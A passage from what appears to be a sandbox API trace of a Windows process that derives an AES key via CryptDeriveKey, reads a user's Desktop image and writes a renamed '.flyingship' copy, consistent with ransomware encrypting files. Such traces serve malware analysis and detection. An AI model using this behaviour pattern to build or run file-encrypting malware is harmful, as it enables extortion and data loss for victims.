(Locale=0x400, dwCmpFlags=0x1, lpString1="LK\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Kq7hl.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.679] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.680] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0164.680] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0164.680] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0164.680] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0164.680] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0164.680] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0164.680] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0164.680] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0164.680] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0164.680] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0164.680] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0164.680] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.680] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f8ef0e0, ftCreationTime.dwHighDateTime=0x1d5e359, ftLastAccessTime.dwLowDateTime=0xb6fce980, ftLastAccessTime.dwHighDateTime=0x1d5ddcd, ftLastWriteTime.dwLowDateTime=0xb6fce980, ftLastWriteTime.dwHighDateTime=0x1d5ddcd, nFileSizeHigh=0x0, nFileSizeLow=0xefde, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="Kq7hl.bmp", cAlternateFileName="")) returned 0x90ae18 [0164.680] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0164.680] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.680] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0164.680] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.681] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0164.681] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0164.681] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.681] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0164.681] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.681] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.681] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0164.681] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0164.681] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0164.713] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.713] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.713] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.713] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0164.714] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.714] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0164.715] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.715] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0164.715] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0164.715] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0164.715] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0164.715] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0164.715] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0164.715] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.715] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0164.715] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.715] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0164.715] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0164.715] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.715] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.715] CryptHashData (hHash=0x90af58, pbData=0x8df028, dwDataLen=0x19, dwFlags=0x1) returned 1 [0164.716] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.716] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0164.716] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.716] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0164.716] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.716] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.716] CryptDestroyHash (hHash=0x90af58) returned 1 [0164.717] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\na3pecvaltbr8vlk\\kq7hl.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0164.717] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.717] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0164.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0164.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0164.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0164.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0164.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0164.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0164.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0164.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0164.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0164.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0164.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0164.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0164.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0164.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0164.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0164.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0164.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0164.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0164.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0164.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0164.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0164.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0164.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0164.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0164.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0164.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0164.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0164.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0164.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0164.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0164.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0164.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0164.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0164.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0164.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0164.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0164.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0164.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0164.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0164.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0164.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0164.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9100 [0164.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0164.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0164.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0164.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0164.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9100 | out: hHeap=0x8a0000) returned 1 [0164.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0164.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0164.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0164.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0164.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0164.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0164.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0164.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0164.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0164.720] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\na3pecvaltbr8vlk")) returned 0x10 [0164.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0164.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0164.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0164.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0164.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0164.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0164.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0164.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0164.721] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.flyingship.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\na3pecvaltbr8vlk\\kq7hl.flyingship.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0164.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0164.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0164.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0164.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0164.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0164.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0164.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0164.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0164.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0164.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0164.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0164.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0164.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0164.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0164.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0164.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0164.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0164.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0164.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0164.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0164.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0164.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0164.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0164.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0164.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0164.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0164.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0164.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0164.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0164.724] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0164.724] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0xefde, lpOverlapped=0x0) returned 1 [0164.727] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0164.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0164.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0164.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0164.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xefde) returned 0x9e5190 [0164.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0164.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0164.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0164.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0164.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0164.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0164.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xefde) returned 0x9f4178 [0164.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9e5190 | out: hHeap=0x8a0000) returned 1 [0164.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.730] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0164.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0164.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0164.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0164.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0164.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xefde) returned 0x9e5190 [0164.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9e5190 | out: hHeap=0x8a0000) returned 1 [0164.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0164.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0164.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0164.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.730] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0164.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0164.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0164.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0164.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0164.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0164.731] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 